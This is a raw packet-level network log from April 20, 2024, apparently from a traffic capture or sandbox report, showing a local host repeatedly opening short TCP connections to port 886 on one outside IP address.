Apr 20, 2024 15:22:53.928849936 CEST	49781	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:54.051997900 CEST	49782	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:54.238178015 CEST	886	49780	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:54.368027925 CEST	886	49782	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:54.368135929 CEST	49782	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:54.368356943 CEST	49782	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:54.682154894 CEST	886	49782	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:54.685033083 CEST	886	49782	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:54.685079098 CEST	886	49782	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:54.685097933 CEST	49782	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:54.685137987 CEST	49782	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:54.685247898 CEST	49782	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:54.735337973 CEST	49781	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:54.801398039 CEST	49783	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:54.999475956 CEST	886	49782	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:55.047812939 CEST	886	49781	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:55.114398956 CEST	886	49783	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:55.114576101 CEST	49783	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:55.114778996 CEST	49783	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:55.427581072 CEST	886	49783	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:55.432183981 CEST	886	49783	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:55.432224035 CEST	886	49783	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:55.432290077 CEST	49783	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:55.432290077 CEST	49783	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:55.432394028 CEST	49783	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:55.552535057 CEST	49784	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:55.867351055 CEST	886	49784	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:55.867517948 CEST	49784	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:55.868470907 CEST	49784	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:56.181046963 CEST	886	49784	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:56.183566093 CEST	886	49784	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:56.183609009 CEST	886	49784	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:56.183814049 CEST	49784	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:56.183814049 CEST	49784	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:56.183814049 CEST	49784	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:56.204185009 CEST	49783	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:56.302272081 CEST	49785	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:56.516910076 CEST	886	49783	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:56.613974094 CEST	886	49785	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:56.614089966 CEST	49785	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:56.614278078 CEST	49785	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:56.927943945 CEST	886	49785	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:56.932862997 CEST	886	49785	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:56.932904005 CEST	886	49785	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:56.932929039 CEST	49785	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:56.932955027 CEST	49785	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:56.933063984 CEST	49785	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:56.969719887 CEST	49784	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:57.055850029 CEST	49786	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:57.244400024 CEST	886	49785	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:57.283133030 CEST	886	49784	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:57.369786978 CEST	886	49786	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:57.370126963 CEST	49786	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:57.370126963 CEST	49786	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:57.681793928 CEST	886	49786	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:57.684832096 CEST	886	49786	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:57.684899092 CEST	886	49786	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:57.685087919 CEST	49786	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:57.685089111 CEST	49786	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:57.685089111 CEST	49786	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:57.802210093 CEST	49787	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:57.997600079 CEST	886	49786	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:58.122627020 CEST	886	49787	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:58.122721910 CEST	49787	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:58.122930050 CEST	49787	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:58.439652920 CEST	886	49787	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:58.442425966 CEST	886	49787	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:58.442466021 CEST	886	49787	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:58.442513943 CEST	49787	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:58.442572117 CEST	49787	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:58.503088951 CEST	49787	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:58.630275965 CEST	49788	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:58.820930958 CEST	886	49787	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:58.943808079 CEST	886	49788	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:58.943958044 CEST	49788	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:59.069041967 CEST	49788	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:59.382134914 CEST	886	49788	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:59.386859894 CEST	886	49788	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:59.386897087 CEST	886	49788	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:59.386917114 CEST	49788	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:59.386941910 CEST	49788	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:59.387088060 CEST	49788	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:59.505131006 CEST	49789	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:59.702114105 CEST	886	49788	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:59.820573092 CEST	886	49789	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:59.820730925 CEST	49789	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:59.824006081 CEST	49789	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:00.137507915 CEST	886	49789	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:00.140428066 CEST	886	49789	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:00.140494108 CEST	886	49789	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:00.140547037 CEST	49789	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:00.140638113 CEST	49789	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:00.140784979 CEST	49789	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:00.256011963 CEST	49790	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:00.570091009 CEST	886	49790	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:00.570194960 CEST	49790	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:00.570365906 CEST	49790	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:00.881874084 CEST	886	49790	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:00.886619091 CEST	886	49790	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:00.886658907 CEST	886	49790	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:00.886740923 CEST	49790	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:00.886740923 CEST	49790	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:00.886956930 CEST	49790	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:00.922944069 CEST	49789	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:01.010046959 CEST	49791	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:01.200263023 CEST	886	49790	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:01.235847950 CEST	886	49789	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:01.324892998 CEST	886	49791	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:01.325015068 CEST	49791	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:01.325170040 CEST	49791	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:01.637252092 CEST	886	49791	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:01.640191078 CEST	886	49791	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:01.640233994 CEST	886	49791	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:01.640292883 CEST	49791	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:01.640292883 CEST	49791	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:01.640451908 CEST	49791	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:01.755844116 CEST	49792	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:01.954866886 CEST	886	49791	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:02.082243919 CEST	886	49792	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:02.082349062 CEST	49792	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:02.082525015 CEST	49792	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:02.408442020 CEST	886	49792	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:02.411448002 CEST	886	49792	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:02.411489010 CEST	886	49792	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:02.411505938 CEST	49792	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:02.411535978 CEST	49792	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:02.411787987 CEST	49792	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:02.535259008 CEST	49793	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:02.737888098 CEST	886	49792	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:02.853676081 CEST	886	49793	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:02.853787899 CEST	49793	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:02.853945971 CEST	49793	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:03.172079086 CEST	886	49793	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:03.176908016 CEST	886	49793	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:03.176948071 CEST	886	49793	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:03.176990032 CEST	49793	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:03.177021027 CEST	49793	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:03.177129030 CEST	49793	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:03.285913944 CEST	49794	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:03.598938942 CEST	886	49794	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:03.599050999 CEST	49794	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:03.599214077 CEST	49794	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:03.912388086 CEST	886	49794	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:03.915080070 CEST	886	49794	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:03.915118933 CEST	886	49794	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:03.915227890 CEST	49794	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:03.915324926 CEST	49794	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:03.915324926 CEST	49794	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:03.969746113 CEST	49793	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:04.036806107 CEST	49795	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:04.228312969 CEST	886	49794	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:04.287935972 CEST	886	49793	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:04.349167109 CEST	886	49795	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:04.349369049 CEST	49795	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:04.349442005 CEST	49795	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:04.661663055 CEST	886	49795	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:04.664644003 CEST	886	49795	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:04.664686918 CEST	886	49795	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:04.664736986 CEST	49795	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:04.664793968 CEST	49795	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:04.664936066 CEST	49795	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:04.785938025 CEST	49796	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:04.979377985 CEST	886	49795	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:05.100958109 CEST	886	49796	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:05.101072073 CEST	49796	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:05.101224899 CEST	49796	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:05.414518118 CEST	886	49796	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:05.419447899 CEST	886	49796	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:05.419487953 CEST	886	49796	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:05.419620037 CEST	49796	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:05.419620037 CEST	49796	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:05.419666052 CEST	49796	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:05.536416054 CEST	49797	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:05.847001076 CEST	886	49797	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:05.847115040 CEST	49797	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:05.847280025 CEST	49797	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:06.157711029 CEST	886	49797	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:06.160495043 CEST	886	49797	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:06.160533905 CEST	886	49797	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:06.160592079 CEST	49797	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:06.160592079 CEST	49797	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:06.160693884 CEST	49797	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:06.188493967 CEST	49796	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:06.270173073 CEST	49798	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:06.503334999 CEST	886	49796	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:06.584243059 CEST	886	49798	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:06.584389925 CEST	49798	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:06.584547997 CEST	49798	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:06.896456957 CEST	886	49798	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:06.899323940 CEST	886	49798	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:06.899364948 CEST	886	49798	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:06.899439096 CEST	49798	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:06.899602890 CEST	49798	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:06.899602890 CEST	49798	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:06.938491106 CEST	49797	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:07.019897938 CEST	49799	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:07.212480068 CEST	886	49798	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:07.248820066 CEST	886	49797	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:07.362274885 CEST	886	49799	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:07.362544060 CEST	49799	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:07.362641096 CEST	49799	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:07.704952002 CEST	886	49799	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:07.709867001 CEST	886	49799	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:07.709908962 CEST	886	49799	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:07.709999084 CEST	49799	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:07.709999084 CEST	49799	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:07.710134983 CEST	49799	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:07.832448006 CEST	49800	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:08.148606062 CEST	886	49800	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:08.148730040 CEST	49800	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:08.148915052 CEST	49800	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:08.467281103 CEST	886	49800	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:08.470316887 CEST	886	49800	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:08.470357895 CEST	886	49800	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:08.470380068 CEST	49800	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:08.470437050 CEST	49800	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:08.470511913 CEST	49800	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:08.563534021 CEST	49799	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:08.583326101 CEST	49801	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:08.786484957 CEST	886	49800	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:08.896862030 CEST	886	49801	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:08.897006989 CEST	49801	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:08.897207975 CEST	49801	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:08.905745029 CEST	886	49799	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:09.210644960 CEST	886	49801	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:09.213671923 CEST	886	49801	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:09.213712931 CEST	886	49801	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:09.213764906 CEST	49801	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:09.213823080 CEST	49801	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:09.213898897 CEST	49801	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:09.332335949 CEST	49802	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:09.527390003 CEST	886	49801	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:09.648340940 CEST	886	49802	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:09.648425102 CEST	49802	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:09.648607016 CEST	49802	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:09.966933966 CEST	886	49802	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:09.972042084 CEST	886	49802	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:09.972114086 CEST	886	49802	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:09.972130060 CEST	49802	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:09.972168922 CEST	49802	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:09.972280025 CEST	49802	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:10.082386971 CEST	49803	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:10.750987053 CEST	49802	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:11.069434881 CEST	886	49802	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:11.094727039 CEST	49803	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:11.417637110 CEST	886	49803	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:11.417741060 CEST	49803	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:11.418049097 CEST	49803	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:11.741152048 CEST	886	49803	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:11.744184017 CEST	886	49803	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:11.744226933 CEST	886	49803	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:11.744251966 CEST	49803	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:11.744271994 CEST	49803	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:11.744365931 CEST	49803	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:11.863818884 CEST	49804	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:12.067564964 CEST	886	49803	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:12.176311016 CEST	886	49804	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:12.176469088 CEST	49804	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:12.183238029 CEST	49804	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:12.493371010 CEST	886	49804	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:12.498246908 CEST	886	49804	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:12.498308897 CEST	886	49804	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:12.498491049 CEST	49804	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:12.498578072 CEST	49804	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:12.498579025 CEST	49804	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:12.614720106 CEST	49805	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:12.940968990 CEST	886	49805	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:12.941126108 CEST	49805	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:12.941323042 CEST	49805	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:13.261967897 CEST	886	49805	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:13.264950991 CEST	886	49805	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:13.265014887 CEST	886	49805	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:13.265068054 CEST	49805	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:13.265378952 CEST	49805	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:13.265378952 CEST	49805	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:13.282346010 CEST	49804	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:13.379436970 CEST	49806	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:13.591351032 CEST	886	49805	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:13.592715025 CEST	886	49804	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:13.697170973 CEST	886	49806	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:13.697300911 CEST	49806	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:13.697618961 CEST	49806	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:14.015477896 CEST	886	49806	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:14.018640041 CEST	886	49806	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:14.018708944 CEST	886	49806	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:14.018814087 CEST	49806	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:14.018814087 CEST	49806	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:14.019078970 CEST	49806	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:14.130501032 CEST	49809	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:14.339242935 CEST	886	49806	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:14.435071945 CEST	886	49809	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:14.435170889 CEST	49809	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:14.435367107 CEST	49809	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:14.739191055 CEST	886	49809	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:14.744247913 CEST	886	49809	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:14.744309902 CEST	886	49809	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:14.744383097 CEST	49809	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:14.744539976 CEST	49809	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:14.869215012 CEST	49810	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:15.045941114 CEST	886	49809	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:15.181233883 CEST	886	49810	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:15.183990955 CEST	49810	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:15.215039968 CEST	49810	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:15.525844097 CEST	886	49810	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:15.528629065 CEST	886	49810	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:15.528690100 CEST	886	49810	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:15.528747082 CEST	49810	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:15.528747082 CEST	49810	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:15.528875113 CEST	49810	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:15.646431923 CEST	49811	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:15.839580059 CEST	886	49810	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:15.961575985 CEST	886	49811	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:15.961916924 CEST	49811	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:15.961918116 CEST	49811	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:16.279695034 CEST	886	49811	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:16.283004999 CEST	886	49811	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:16.283071041 CEST	886	49811	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:16.283216953 CEST	49811	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:16.283216953 CEST	49811	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:16.283296108 CEST	49811	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:16.396109104 CEST	49812	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:16.598313093 CEST	886	49811	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:16.709830046 CEST	886	49812	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:16.709949970 CEST	49812	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:16.710163116 CEST	49812	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:17.023211956 CEST	886	49812	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:17.027992010 CEST	886	49812	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:17.028053999 CEST	886	49812	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:17.028053999 CEST	49812	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:17.028115988 CEST	49812	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:17.028204918 CEST	49812	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:17.145092964 CEST	49813	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:17.343413115 CEST	886	49812	118.89.125.171	192.168.2.5
